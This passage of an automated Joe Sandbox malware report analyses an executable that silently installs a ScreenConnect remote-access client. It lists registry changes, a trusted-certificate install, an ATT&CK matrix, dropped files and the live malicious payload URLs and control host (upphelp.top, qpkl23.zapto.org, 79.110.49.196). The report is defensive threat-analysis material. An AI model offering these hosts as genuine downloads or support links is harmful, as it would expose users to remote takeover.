Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe

Code function: 12_2_00007FFD34653642 CreateNamedPipeW,

12_2_00007FFD34653642

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_00021806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00021806

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Remote Access Functionality

Yara detected ScreenConnect Tool

Source: Yara match	File source: 9.0.ScreenConnect.WindowsClient.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2999833132.0000015F80352000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 3488, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Windows Service	2 Windows Service	1 Install Root Certificate	Security Account Manager	34 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	13 Process Injection	1 Software Packing	NTDS	51 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Search Order Hijacking	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	51 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	13 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Users	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Bootkit	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mrKs8EKXbz.exe	8%	Virustotal		Browse
mrKs8EKXbz.exe	18%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
qpkl23.zapto.org	0%	Virustotal	Browse
upphelp.top	1%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://upphelp.top/Bin/ScreenConnect.Windows.dll	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe	2%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.Core.dll	2%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.WindowsC	1%	Virustotal		Browse
https://upphelp.top	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.x	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.WindowsFileManag	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config	1%	Virustotal		Browse
http://upphelp.top	1%	Virustotal		Browse
http://www.xrml.org/schema/2001/11/xrml2coreS	0%	Virustotal		Browse
http://www.w3.o	0%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appP	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.e	1%	Virustotal		Browse
http://www.xrml.org/schema/2001/11/xrml2core	0%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.Client.application	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.ClientService.exe	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.Client.dll	2%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.Client.application=	1%	Virustotal		Browse
https://upphelp.top/Bin/ScreenConnect.ClientSe	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
qpkl23.zapto.org	79.110.49.196	true	true	0%, Virustotal, Browse	unknown
upphelp.top	79.110.49.196	true	true	1%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://upphelp.top/Bin/ScreenConnect.Windows.dll	true	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe	true	2%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config	true	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Core.dll	true	2%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe	true	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config	true	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.ClientService.exe	true	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Client.dll	true	2%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe	true		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe.config	true		unknown
https://upphelp.top/Bin/ScreenConnect.Client.manifest	true		unknown
https://upphelp.top/Bin/ScreenConnect.ClientService.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://upphelp.top/Bin/ScreenConnect.Client.applicationf	dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Core.dllY	dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsFileManag	dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application	ScreenConnect.WindowsClient.exe, 00000009.00000002.2398651686.0000000001189000.00000004.00000020.00020000.00000000.sdmp, DU2B58II.log.2.dr	false	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe.configfw	dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsC	dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Client.manifestF	dfsvc.exe, 00000002.00000002.3011349538.0000015F99780000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.x	dfsvc.exe, 00000002.00000002.2999833132.0000015F8079B000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://upphelp.top	dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8079B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80253000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.xrml.org/schema/2001/11/xrml2coreS	dfsvc.exe, 00000002.00000002.2999833132.0000015F80090000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Windows.dll7	dfsvc.exe, 00000002.00000002.3012064740.0000015F998BF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.ClientService.dllV	dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.w3.o	dfsvc.exe, 00000002.00000002.2999833132.0000015F8043C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8042A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exeNt	dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.exeow	dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dfsvc.exe, 00000002.00000002.2999833132.0000015F8001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3395048636.0000000002252000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upphelp.top	dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8079B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80797000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Client.application%	ScreenConnect.WindowsClient.exe, 00000009.00000002.2400989518.000000001BA06000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsFileManager.e	dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Client.application	dfsvc.exe, 00000002.00000002.3011555377.0000015F997CF000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011349538.0000015F99780000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3014031358.0000015F9B4DC000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3005354461.0000015F98020000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011871515.0000015F99831000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011736711.0000015F99804000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80352000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3011816151.0000015F99815000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2398689538.000000000120F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399007131.000000000126F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399294673.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399294673.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2400989518.000000001BA06000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appP	dfsvc.exe, 00000002.00000002.3014224516.0000015F9B4E0000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.ClientService.dll~	dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.xrml.org/schema/2001/11/xrml2core	dfsvc.exe, 00000002.00000002.2999833132.0000015F80090000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://upphelp.top/Bin/ScreenConnect.Client.application;	ScreenConnect.WindowsClient.exe, 00000009.00000002.2399007131.000000000126F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.w3.or	dfsvc.exe, 00000002.00000002.2999833132.0000015F8045F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8043C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80352000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F804C5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000007.00000003.2152396817.000001EE1B4E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr	false		unknown
https://upphelp.top/Bin/ScreenConnect.ClientSe	dfsvc.exe, 00000002.00000002.2999833132.0000015F80545000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://crl.ver)	svchost.exe, 00000007.00000002.3395312503.000001EE1B600000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.application=	dfsvc.exe, 00000002.00000002.3014031358.0000015F9B4DC000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://upx.sf.net	Amcache.hve.5.dr	false	URL Reputation: safe	unknown
https://upphelp.top/Bin/ScreenConnect.Wind	dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsClient.exe6	dfsvc.exe, 00000002.00000002.3013240038.0000015F99963000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041	DU2B58II.log.2.dr	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.application8	dfsvc.exe, 00000002.00000002.3014031358.0000015F9B4DC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.applicationsers%&/	ScreenConnect.WindowsClient.exe, 00000009.00000002.2400651900.000000001B9A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.applicationA	ScreenConnect.WindowsClient.exe, 00000009.00000002.2398689538.000000000120F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/Prod1C:	edb.log.7.dr	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.applicationH	ScreenConnect.WindowsClient.exe, 00000009.00000002.2400989518.000000001BA06000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsBackstage	dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll.2.dr	false		unknown
https://upphelp.top/Bin/ScreenConnect.Clie	dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.applicationX	ScreenConnect.WindowsClient.exe, 00000009.00000002.2399294673.0000000002F1F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.application?e=	mrKs8EKXbz.exe, 00000001.00000002.2182851110.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.applicationc	ScreenConnect.WindowsClient.exe, 00000009.00000002.2399007131.000000000126F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.Client.applicatione	ScreenConnect.WindowsClient.exe, 00000009.00000002.2400651900.000000001B9A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.ex	dfsvc.exe, 00000002.00000002.2999833132.0000015F80629000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeEt	dfsvc.exe, 00000002.00000002.3005354461.0000015F98115000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://upphelp.top/Bin/ScreenConnect.WindowsClient.ex	dfsvc.exe, 00000002.00000002.2999833132.0000015F805C5000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.110.49.196	qpkl23.zapto.org	Germany		57287	OTAVANET-ASCZ	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522646
Start date and time:	2024-09-30 14:19:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	mrKs8EKXbz.exe renamed because original name is a hash value
Original Sample Name:	9be96842563827373caedce47de8191e2be93f6d3286cf8b4286492be4445cad.exe
Detection:	MAL
Classification:	mal63.evad.winEXE@18/74@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 57% Number of executed functions: 201 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 20.189.173.20, 93.184.221.240, 184.28.90.27
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 3488 because it is empty
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 5728 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:19:58	API Interceptor	313731x Sleep call for process: dfsvc.exe modified
08:19:58	API Interceptor	1x Sleep call for process: mrKs8EKXbz.exe modified
08:19:59	API Interceptor	2x Sleep call for process: svchost.exe modified
08:20:02	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
